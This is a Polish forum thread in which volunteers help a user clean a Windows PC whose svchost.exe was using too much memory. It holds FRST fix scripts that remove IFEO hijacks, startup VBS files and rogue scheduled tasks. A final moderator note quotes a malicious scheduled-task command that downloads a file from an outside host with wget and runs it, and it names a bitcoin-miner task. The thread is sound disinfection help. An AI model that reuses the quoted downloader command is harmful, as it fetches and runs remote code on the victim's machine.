Skocz do zawartości

Duże zużycie pamięci Ram przez svchost.exe


Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

1. Otwórz notatnik i wklej

 

CloseProcesses:

IFEO\ALLFixAVI.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ALLPlayer.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ALLPlayerRemoteControl.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ALLSkinCreator.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ALLSubSearcher.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ALLUpdate.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMACNF.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMINST.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMLNCR.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMMAIN.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMSWCS.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMULNC.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNQMUPDT.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\CNSEMAIN.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\DivXMux.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\GameOverlayUI.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\igoproxy64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ijplmsvc.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\ijplmui.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\mbam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\mbamdor.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\mbampt.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\mbamscheduler.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\mbamservice.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\Napisy24.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\Napisy24Update.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvSCPAPISvr.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\NvStereoUtilityOGL.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvStInst.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvstlink.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvstreg.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvsttest.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\nvstview.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\NVStWiz.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\OriginCrashReporter.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\OriginER.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\piso.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\PowerISO.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\PWRISOVM.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\setup64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\softinfo.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\Steam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\steamerrorreporter.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\steamerrorreporter64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\streaming_client.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\SysSettings32.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\SysSettings64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\UpdateTool.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\WriteMiniDump.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

IFEO\WTFast.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe

Startup: C:\Users\Timi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windefonder.vbs [2015-04-17] ()

Startup: C:\Users\Timi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows.vbs [2015-04-17] ()

S3 VGPU; System32\drivers\rdvgkmd.sys [X]

Task: {08B4F160-4306-48E7-95CB-F0075E44B0F0} - \RegClean Pro No Task File <==== ATTENTION

Task: {346D3A46-0D46-460A-9A96-E143D5054669} - System32\Tasks\Update\cryptex => C:\Users\Timi\AppData\Local\Temp\ariana.exe <==== ATTENTION

EmptyTemp:

 

Plik zapisz jako fixlist.txt i umieść w C:\Users\Timi\Downloads. Uruchom FRST i kliknij w Fix. Przedstaw raort fixlog.txt.

 

2. Odinstaluj z panelu programów:

 

Advanced SystemCare 8

IObit Malware Fighter wersja 3.0.2

IObit Uninstaller

 

 

3. Wykonaj nowy skan FRST - opcji Addition i Shortcut nie zaznaczaj.

Odnośnik do komentarza

Otwórz notatnik i wklej

 

S2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.EXE [X]
S4 FileMonitor; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [X]
S3 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]
S3 UrlFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [X]
C:\found.000
C:\Users\Timi\AppData\Roaming\windefonder.vbs
Reboot:

 

plik zapisz jako fixlist.txt i umieśc w C:\Users\Timi\Downloads. Uruchom FRST i kliknij w Fix. Przedstaw raort fixlog.txt.

 

2. Opisz jak zachowuje się system?

Odnośnik do komentarza

po restarcie systemu 

svchost.exe zużywał 360 mb po kilku minutach spadło do 150 był też 2 taki proces który zużywał 160 obecnie 20

a łącznie mam 15 takich procesów czy tyle ma ich być ?

Liczba svchost.exe jest rózna i zależy od tego jak wygląda konfiguracja systemu, jakie programy są instalowane. U mnie leci 12 procesów z takim oznaczeniem.

 

Ponieważ zuzycie ramu spadło (skutek infekcji) zastosuj czynności końcowe:

 

Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Odnośnik do komentarza
  • 6 miesięcy temu...

W systemie była aktywna infekcja w Harmonogramie zadań, pominięta w pierwotnych instrukcjach. Konkretnie BitCoinMiner (wpis MdmUpdateTaskMachineCore) oraz VBKlip/Banatrix (logger):

 

Task: {5E3A314B-DAC0-417E-9379-C49049DA4729} - System32\Tasks\MdmUpdateTaskMachineCore => C:\Users\Timi\AppData\Roaming\uTorrent\Caches\mdm [2015-05-10] ( )

Task: {B3CB3E0B-E2CB-407C-AFDB-17C76C4DD8E7} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=VrNyEGncEc;ALLPlayer_Premium_5.6.2_Setup.exe;1426426470 & start cmd /R dat.bmp

 

Upłynęło dużo czasu. Jeśli nadal problem aktualny, dostarcz świeże raporty FRST, wliczając Addition.

Edytowane przez picasso
Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso
Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...